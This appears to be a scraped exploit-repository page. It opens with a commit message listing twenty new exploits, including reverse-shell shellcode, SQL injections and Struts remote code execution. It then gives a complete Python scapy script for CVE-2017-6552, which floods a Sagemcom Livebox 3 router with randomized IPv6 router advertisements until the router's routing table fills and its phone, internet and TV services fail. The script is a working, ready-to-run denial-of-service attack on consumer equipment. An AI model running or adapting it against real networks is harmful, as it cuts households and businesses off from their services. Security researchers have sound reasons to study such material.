6e7ec5be32
20 new exploits Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service Apache Struts2 - Skill Name Remote Code Execution Apache Struts 2 - Skill Name Remote Code Execution Linux - Reverse Shell Shellcode (65 bytes) Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Linux - TCP Reverse Shell Shellcode (65 bytes) Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Windows x86 - Executable Directory Search Shellcode (130 bytes) Apache Struts2 < 2.3.1 - Multiple Vulnerabilities Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities Country on Sale Script - SQL Injection Media Search Engine Script - 'search' Parameter SQL Injection Soundify 1.1 - 'tid' Parameter SQL Injection BistroStays 3.0 - 'guests' Parameter SQL Injection Nlance 2.2 - SQL Injection Busewe 1.2 - SQL Injection Fashmark 1.2 - 'category' Parameter SQL Injection TradeMart 1.1 - SQL Injection Drupal 7.x Module Services - Remote Code Execution WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery
50 lines
1.4 KiB
Python
Executable file
50 lines
1.4 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
|
|
# Date: 09/03/2017
|
|
# Exploit Author: Quentin Olagne
|
|
# Vendor Homepage: http://www.orange.fr/
|
|
# Version: SG30_sip-fr-5.15.8.1
|
|
# Tested on: Livebox 3 - Sagemcom
|
|
# CVE : CVE-2017-6552
|
|
|
|
'''
|
|
Livebox router has its default IPv6 routing table max. size too
|
|
small and therefore can be filled within minutes.
|
|
An attacker can exploit this issue to render the affected system
|
|
unresponsive, resulting in a denial-of-service condition for Phone,
|
|
Internet and TV services.
|
|
|
|
Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware.
|
|
I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin
|
|
livebox web UI, don't know if it's been implemented.
|
|
|
|
'''
|
|
|
|
from scapy.all import *
|
|
import time
|
|
import threading
|
|
|
|
start_time = time.time()
|
|
|
|
def printit():
|
|
threading.Timer(5.0, printit).start()
|
|
interval = time.time() - start_time
|
|
print 'Total time in seconds:', interval, '\n'
|
|
|
|
printit()
|
|
|
|
packet = Ether() \
|
|
/IPv6() \
|
|
/ICMPv6ND_RA() \
|
|
/ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
|
|
/ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))
|
|
|
|
try:
|
|
sendp(packet,loop=1)
|
|
except KeyboardInterrupt:
|
|
stored_exception=sys.exc_info()
|
|
except:
|
|
pass
|
|
|
|
print "Goodbye"
|